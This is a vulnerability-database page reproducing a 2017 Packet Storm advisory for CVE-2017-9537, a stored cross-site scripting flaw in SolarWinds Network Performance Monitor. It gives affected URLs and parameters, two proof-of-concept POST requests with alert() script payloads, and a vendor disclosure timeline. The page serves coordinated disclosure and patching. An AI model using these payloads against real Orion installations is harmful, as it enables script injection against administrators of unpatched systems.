Lucene search
K
Database
Vendors
Products
Years
CVSS
Scanner
Agent Scanning
API Scanning
Manual Audit
Perimeter Scanner
Scanning
Projects
Email
Webhook
Plugins
Resources
Documents
Blog
Glossary
FAQ
Pricing
Contacts
About Us
Partners
Branding Guideline
packetstormAndy TanPACKETSTORM:144411
HistorySep 29, 2017 - 12:00 a.m.

SolarWinds Network Performance Monitor 12.0.15300.90 Cross Site Scripting

2017-09-2900:00:00
Andy Tan
packetstormsecurity.com
27

0.001 Low

EPSS

Percentile

28.8%

JSON
`-------------------------------------------------------------  
Vulnerability type: Persistent Cross-Site Scripting  
-------------------------------------------------------------  
Credit: Andy Tan  
CVE ID: CVE-2017-9537  
-----------------------------------------------  
Product: SolarWinds Network Performance Monitor  
-----------------------------------------------  
Affected version: SolarWinds Network Performance Monitor version 12.0.15300.90 and possibly earlier  
Hotfix: SolarWinds Orion Platform 2017.3 Hotfix 1  
  
1.  
Affected URL: https://<ip>/Orion/Nodes/Add/Properties.aspx  
Affected parameter: City, Comments, Department  
Affected functions: Group Description field, Last_XX_Events resource, Events page, and error page  
Navigation: (Settings -> Manage Nodes -> Add Node)  
  
2.  
Affected Source URL: https://<ip>/Orion/Services/WebAdmin.asmx/CreateExternalWebsite  
Affected parameter: FullTitle  
Affected URL: https://<ip>/Orion/External.aspx?Site=<no>  
Navigation: (Settings -> All Settings -> External Websites)  
  
  
================  
Proof of Concept  
================  
1.  
POST /Orion/Nodes/Add/Properties.aspx HTTP/1.1  
  
<Fill up rest of the headers>  
  
  
<Fill up rest of the parameters>ctl00%24ctl00%24ctl00%24BodyContent%24ContentPlaceHolder1%24adminContentPlaceholder%24ctl06%24repCustomProperties%24ctl00%24PropertyValue%24TextBoxEditorValue=%3CIMG%20SRC%3D%20a%20onerror%3Dalert('testXSSCity')%3E&ctl00%24ctl00%24ctl00%24BodyContent%24ContentPlaceHolder1%24adminContentPlaceholder%24ctl06%24repCustomProperties%24ctl01%24PropertyValue%24TextBoxEditorValue=%3CIMG%20SRC%3D%20a%20onerror%3Dalert('testXSSComments')%3E&ctl00%24ctl00%24ctl00%24BodyContent%24ContentPlaceHolder1%24adminContentPlaceholder%24ctl06%24repCustomProperties%24ctl02%24PropertyValue%24TextBoxEditorValue=%3CIMG%20SRC%3D%20a%20onerror%3Dalert('testXSSDept')%3E  
  
2.  
POST /Orion/Services/WebAdmin.asmx/CreateExternalWebsite HTTP/1.1  
  
<Fill up rest of the headers>  
  
  
  
{"site":{"ID":0,"ShortTitle":"title","FullTitle":"</title><script>alert('DTPTXSS!')</script>","URL":"url"},"menuBar":"Default"}  
  
------------------------  
Vendor contact timeline:  
------------------------  
2017-06-12: Contacted vendor.  
2017-06-23: Vendor responded that bug jury completed and vulnerability is assigned to vNext milestone.  
2017-08-22: Contacted vendor again.  
2017-08-23: Vendor responded that hotfix will be released for all products shipping on Orion Core 2017.3  
2017-09-28: Contacted vendor again.  
2017-09-28: Vendor responded that the vulnerability is addressed in the recently released Hotfix for Core 2017.3  
2017-09-29: Public disclosure.  
`

Related

cvelist 1
zdt 1
nvd 1
cve 1
prion 1
openvas 1
cvelist
cvelist
CVE-2017-9537
2017-10-02 14:00:00
zdt
zdt
SolarWinds Network Performance Monitor 12.0.15300.90 Cross Site Scripting Vulnerability
2017-09-30 00:00:00
nvd
nvd
CVE-2017-9537
2017-10-03 01:29:03
cve
cve
CVE-2017-9537
2017-10-03 01:29:03
prion
prion
Cross site scripting
2017-10-03 01:29:00
openvas
openvas
SolarWinds Orion NPM Multiple Vulnerabilities
2017-11-21 00:00:00

0.001 Low

EPSS

Percentile

28.8%

JSON
Related for PACKETSTORM:144411
cvelist1zdt1nvd1cve1prion1openvas1